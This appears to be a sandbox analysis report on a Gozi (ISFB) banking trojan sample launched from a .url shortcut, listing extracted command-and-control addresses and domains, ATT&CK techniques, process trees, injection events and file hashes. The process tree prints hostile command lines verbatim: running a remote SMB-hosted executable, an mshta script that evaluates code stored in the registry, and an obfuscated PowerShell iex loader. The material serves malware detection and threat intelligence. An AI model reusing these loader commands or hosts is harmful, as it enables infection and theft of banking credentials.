gozi | 59944e8c11bfc2d065ef88fca0a033313361ae424962c34573755da99badbf3f

Analysis

max time kernel
149s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
04-10-2023 17:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

59944e8c11bfc2d065ef88fca0a033313361ae424962c34573755da99badbf3f_JC.url
Size

192B
MD5

c6c6f5a3d3e0444820d2865c7f1a07bc
SHA1

5f9c9620e315b09802e8e532f48195a9e60f2d2c
SHA256

59944e8c11bfc2d065ef88fca0a033313361ae424962c34573755da99badbf3f
SHA512

4a1a66efff8336bbde327c9256e6e473193c901bc47d1b7648bbfa29212490f3f47092ba060c47cc77a1e6952f6bf814346045d2d1c1eef556ba07d08f69c628

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4276 set thread context of 2572	4276	powershell.exe	Explorer.EXE
PID 2572 set thread context of 3728	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 set thread context of 3984	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 set thread context of 4836	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 set thread context of 4044	2572	Explorer.EXE	cmd.exe
PID 4044 set thread context of 1604	4044	cmd.exe	PING.EXE
PID 2572 set thread context of 1508	2572	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2540 1268 WerFault.exe client.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1604 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1604 PING.EXE

pid	pid_target	process	target process
2540	1268	WerFault.exe	client.exe

pid	process
1604	PING.EXE

pid	process
1604	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
1268	client.exe
1268	client.exe
4276	powershell.exe
4276	powershell.exe
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4276 powershell.exe
2572 Explorer.EXE
2572 Explorer.EXE
2572 Explorer.EXE
2572 Explorer.EXE
2572 Explorer.EXE
4044 cmd.exe

pid	process
4276	powershell.exe
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
2572	Explorer.EXE
4044	cmd.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exeExplorer.EXEsvchost.exeRuntimeBroker.exe

description	pid	process
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeShutdownPrivilege	2572	Explorer.EXE
Token: SeCreatePagefilePrivilege	2572	Explorer.EXE
Token: SeShutdownPrivilege	2572	Explorer.EXE
Token: SeCreatePagefilePrivilege	2572	Explorer.EXE
Token: SeShutdownPrivilege	2572	Explorer.EXE
Token: SeCreatePagefilePrivilege	2572	Explorer.EXE
Token: SeShutdownPrivilege	2572	Explorer.EXE
Token: SeCreatePagefilePrivilege	2572	Explorer.EXE
Token: SeManageVolumePrivilege	2668	svchost.exe
Token: SeShutdownPrivilege	3728	RuntimeBroker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

2572 Explorer.EXE

pid	process
2572	Explorer.EXE

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

rundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3156 wrote to memory of 1268	3156	rundll32.exe	client.exe
PID 3156 wrote to memory of 1268	3156	rundll32.exe	client.exe
PID 3156 wrote to memory of 1268	3156	rundll32.exe	client.exe
PID 1232 wrote to memory of 4276	1232	mshta.exe	powershell.exe
PID 1232 wrote to memory of 4276	1232	mshta.exe	powershell.exe
PID 4276 wrote to memory of 2056	4276	powershell.exe	csc.exe
PID 4276 wrote to memory of 2056	4276	powershell.exe	csc.exe
PID 2056 wrote to memory of 2660	2056	csc.exe	cvtres.exe
PID 2056 wrote to memory of 2660	2056	csc.exe	cvtres.exe
PID 4276 wrote to memory of 408	4276	powershell.exe	csc.exe
PID 4276 wrote to memory of 408	4276	powershell.exe	csc.exe
PID 408 wrote to memory of 3260	408	csc.exe	cvtres.exe
PID 408 wrote to memory of 3260	408	csc.exe	cvtres.exe
PID 4276 wrote to memory of 2572	4276	powershell.exe	Explorer.EXE
PID 4276 wrote to memory of 2572	4276	powershell.exe	Explorer.EXE
PID 4276 wrote to memory of 2572	4276	powershell.exe	Explorer.EXE
PID 4276 wrote to memory of 2572	4276	powershell.exe	Explorer.EXE
PID 2572 wrote to memory of 3728	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 3728	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 3728	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 3728	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 3984	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 3984	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 3984	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 3984	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 4836	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 4836	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 4836	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 4836	2572	Explorer.EXE	RuntimeBroker.exe
PID 2572 wrote to memory of 4044	2572	Explorer.EXE	cmd.exe
PID 2572 wrote to memory of 4044	2572	Explorer.EXE	cmd.exe
PID 2572 wrote to memory of 4044	2572	Explorer.EXE	cmd.exe
PID 2572 wrote to memory of 4044	2572	Explorer.EXE	cmd.exe
PID 2572 wrote to memory of 4044	2572	Explorer.EXE	cmd.exe
PID 2572 wrote to memory of 1508	2572	Explorer.EXE	cmd.exe
PID 2572 wrote to memory of 1508	2572	Explorer.EXE	cmd.exe
PID 2572 wrote to memory of 1508	2572	Explorer.EXE	cmd.exe
PID 2572 wrote to memory of 1508	2572	Explorer.EXE	cmd.exe
PID 4044 wrote to memory of 1604	4044	cmd.exe	PING.EXE
PID 4044 wrote to memory of 1604	4044	cmd.exe	PING.EXE
PID 4044 wrote to memory of 1604	4044	cmd.exe	PING.EXE
PID 4044 wrote to memory of 1604	4044	cmd.exe	PING.EXE
PID 4044 wrote to memory of 1604	4044	cmd.exe	PING.EXE
PID 2572 wrote to memory of 1508	2572	Explorer.EXE	cmd.exe
PID 2572 wrote to memory of 1508	2572	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3728

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\59944e8c11bfc2d065ef88fca0a033313361ae424962c34573755da99badbf3f_JC.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3156

\??\UNC\62.173.146.46\scarica\client.exe
"\\62.173.146.46\scarica\client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 472
3⤵
- Program crash
PID:2540

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4836

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3984

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2572

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>J96e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(J96e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F\\\MemoryMusic'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1232

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xurgdxhxel -value gp; new-alias -name flejjfbm -value iex; flejjfbm ([System.Text.Encoding]::ASCII.GetString((xurgdxhxel "HKCU:Software\AppDataLow\Software\Microsoft\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F").LinkAbout))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4276

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j235xxaq\j235xxaq.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2056

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80AF.tmp" "c:\Users\Admin\AppData\Local\Temp\j235xxaq\CSCEBFE41B76DB4E25A3803426B9348E7E.TMP"
5⤵
PID:2660

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tjq0poem\tjq0poem.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:408

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81D8.tmp" "c:\Users\Admin\AppData\Local\Temp\tjq0poem\CSC7BA5457EC245B986C775C3D1CF316.TMP"
5⤵
PID:3260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "\\62.173.146.46\scarica\client.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4044

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1604

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1268 -ip 1268
1⤵
PID:1476

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:1164

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES80AF.tmp
Filesize
1KB

MD5
8411576862a4a37b4165f6d4753d2eda

SHA1
cba80318761f66341404926ad34291decc2d6de1

SHA256
07708bcb2bd615ac56d220f4ac61ac848d35f3c425f7b664e03368c60d188667

SHA512
d7830b01d8f474448936abd4d2b91835c8df7a83f4e7bc6e569e1f3aedd5ae29a18e116178cf87a14086324e7827de56b6cb35f0d106b6013f86ced33acfdf22

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES81D8.tmp
Filesize
1KB

MD5
399bf72093ed64c56319ba6d9af3914f

SHA1
be3fa553c2d543a7328e68cb351410c7aaac583d

SHA256
1d0564acce87bc37f5678fae42fea7f9ae14d1c7e166a6f6307f88c613a9a616

SHA512
1e5fd92c5cb14f876dcf069c06f1e95d98b37fcd1e58d4b746f46bde6972c679ac797b0b1b8913b6ce671d69390238bcbdd52ebb9d4436205413ec6ddd8fd2bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rzl15azl.5bp.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\j235xxaq\j235xxaq.dll
Filesize
3KB

MD5
4b9c51c5922ae6fd691402452dae902a

SHA1
f8b41220988a4f84ba7933f4522d8104fa854e06

SHA256
507839940d966b40e8221912ccd5e7a16c380a4cde195b17a94d99aac9470e3c

SHA512
ac7c1111f50dc0bbec68a222316c169f0f2800b82763ad02e71111e5e326a228b501560bb314271236418d6de09383e9d6b6c03b7414100f35366500b3cca924

Download Submit
C:\Users\Admin\AppData\Local\Temp\tjq0poem\tjq0poem.dll
Filesize
3KB

MD5
42fcddd9c4d19f8454d57ad529fb332e

SHA1
bdf674b7a4324189d790d46ee77975d4886b0d2d

SHA256
c546d70220d9461bb1b5abb7084b268e5c90a20502714c5fb6daa4263f3b39c9

SHA512
5847db81df468f7a743ac69562a5f3a89cf195d583d4f6cdeac3b34e26022e771d36a12ea4ff471687da39e97d959a1088b99503fa20cad52a077626b0ea5e13

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j235xxaq\CSCEBFE41B76DB4E25A3803426B9348E7E.TMP
Filesize
652B

MD5
374dc897a58202576d89a4befcf4406f

SHA1
e7e62f153891aee95bc893eb0c5716dfc3db4919

SHA256
0c3a36ce1974b518dcdb5251efd938fca7f78052b0157bd95d8f0b18324604f1

SHA512
49941afbfdafcadeb3c73b820c97ead6419b41357f940479be51dde2286e7e0c0b8f630a91ab06960471115b702a359bfecfaaeaf7a260189f1b6d707f9a3fc3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j235xxaq\j235xxaq.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\j235xxaq\j235xxaq.cmdline
Filesize
369B

MD5
0ca76ac3183070bfa4988001cc327374

SHA1
c2f430b9209e12be974d63992c940a7aaca59224

SHA256
c881d2638f884baaa5a136944c9f6108edbf66e3000b6e278614d016b773e16e

SHA512
dce569ce88e79ec1719ade34b918f6c9e352e2bb2863f0eb5e3abe8a2a39dfa25252a79deada9a53c3175ab614485cbbac405c808c6b0bd6cb6fe08f592d8a41

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tjq0poem\CSC7BA5457EC245B986C775C3D1CF316.TMP
Filesize
652B

MD5
228a41e459ae810736b8b5e3633faf40

SHA1
3e46c4d643b5741747cd4c94b3d167624dfd6276

SHA256
3b5649268f8f95eeaa5f0ba33575e4c72a14f04818901b580ef300d20e0f35d3

SHA512
72a04820d1afc611f37f97d04e66c327a23db2619bad5634b05cfe1615f25877ca26467b00b73e3a6667d09edd1620685b8fa2d304bba90141f48ec64dfa1a07

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tjq0poem\tjq0poem.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tjq0poem\tjq0poem.cmdline
Filesize
369B

MD5
c864e627ce605c1c696b4b6fbb2c9883

SHA1
860b7089595160080f8607722333abdfa18fcaac

SHA256
490c00c41e9840bbac064b36710caf294d7a8084cd4eebeb7f7496c0a10511cc

SHA512
66d3cb65588f3130f33a6e99ce2258a72eb71e2f8afa53fbd0f743ea5b5578ecbc55cfa2936dcf0eb13b9c53285fec3fa566e79f4e54362dbd955b720aa267cb

Download Submit
memory/1268-8-0x00000000024F0000-0x00000000025F0000-memory.dmp

Filesize
1024KB

Download
memory/1268-1-0x00000000024F0000-0x00000000025F0000-memory.dmp

Filesize
1024KB

Download
memory/1268-115-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/1268-9-0x0000000002430000-0x000000000243B000-memory.dmp

Filesize
44KB

Download
memory/1268-7-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/1268-4-0x0000000002490000-0x000000000249D000-memory.dmp

Filesize
52KB

Download
memory/1268-3-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/1268-2-0x0000000002430000-0x000000000243B000-memory.dmp

Filesize
44KB

Download
memory/1508-111-0x00000000012A0000-0x00000000012A1000-memory.dmp

Filesize
4KB

Download
memory/1508-104-0x0000000001640000-0x00000000016D8000-memory.dmp

Filesize
608KB

Download
memory/1508-113-0x0000000001640000-0x00000000016D8000-memory.dmp

Filesize
608KB

Download
memory/1604-108-0x000001F073C00000-0x000001F073C01000-memory.dmp

Filesize
4KB

Download
memory/1604-103-0x000001F073E00000-0x000001F073EA4000-memory.dmp

Filesize
656KB

Download
memory/1604-117-0x000001F073E00000-0x000001F073EA4000-memory.dmp

Filesize
656KB

Download
memory/2572-66-0x0000000003090000-0x0000000003091000-memory.dmp

Filesize
4KB

Download
memory/2572-65-0x0000000008F70000-0x0000000009014000-memory.dmp

Filesize
656KB

Download
memory/2572-105-0x0000000008F70000-0x0000000009014000-memory.dmp

Filesize
656KB

Download
memory/2668-136-0x000001B47B680000-0x000001B47B690000-memory.dmp

Filesize
64KB

Download
memory/2668-120-0x000001B47B580000-0x000001B47B590000-memory.dmp

Filesize
64KB

Download
memory/3728-114-0x0000026179820000-0x00000261798C4000-memory.dmp

Filesize
656KB

Download
memory/3728-79-0x00000261793E0000-0x00000261793E1000-memory.dmp

Filesize
4KB

Download
memory/3728-78-0x0000026179820000-0x00000261798C4000-memory.dmp

Filesize
656KB

Download
memory/3984-84-0x0000028C1D280000-0x0000028C1D324000-memory.dmp

Filesize
656KB

Download
memory/3984-85-0x0000028C1D240000-0x0000028C1D241000-memory.dmp

Filesize
4KB

Download
memory/3984-116-0x0000028C1D280000-0x0000028C1D324000-memory.dmp

Filesize
656KB

Download
memory/4044-96-0x000001E313A90000-0x000001E313B34000-memory.dmp

Filesize
656KB

Download
memory/4044-97-0x000001E3138B0000-0x000001E3138B1000-memory.dmp

Filesize
4KB

Download
memory/4044-119-0x000001E313A90000-0x000001E313B34000-memory.dmp

Filesize
656KB

Download
memory/4276-31-0x00007FFF4B120000-0x00007FFF4BBE1000-memory.dmp

Filesize
10.8MB

Download
memory/4276-34-0x0000020ED93C0000-0x0000020ED93D0000-memory.dmp

Filesize
64KB

Download
memory/4276-33-0x0000020ED93C0000-0x0000020ED93D0000-memory.dmp

Filesize
64KB

Download
memory/4276-32-0x0000020ED93C0000-0x0000020ED93D0000-memory.dmp

Filesize
64KB

Download
memory/4276-76-0x0000020ED96F0000-0x0000020ED972D000-memory.dmp

Filesize
244KB

Download
memory/4276-61-0x0000020ED96E0000-0x0000020ED96E8000-memory.dmp

Filesize
32KB

Download
memory/4276-21-0x0000020ED9360000-0x0000020ED9382000-memory.dmp

Filesize
136KB

Download
memory/4276-75-0x00007FFF4B120000-0x00007FFF4BBE1000-memory.dmp

Filesize
10.8MB

Download
memory/4276-63-0x0000020ED96F0000-0x0000020ED972D000-memory.dmp

Filesize
244KB

Download
memory/4276-47-0x0000020ED93B0000-0x0000020ED93B8000-memory.dmp

Filesize
32KB

Download
memory/4836-89-0x000001BA0CF40000-0x000001BA0CFE4000-memory.dmp

Filesize
656KB

Download
memory/4836-118-0x000001BA0CF40000-0x000001BA0CFE4000-memory.dmp

Filesize
656KB

Download
memory/4836-91-0x000001BA0C7E0000-0x000001BA0C7E1000-memory.dmp

Filesize
4KB

Download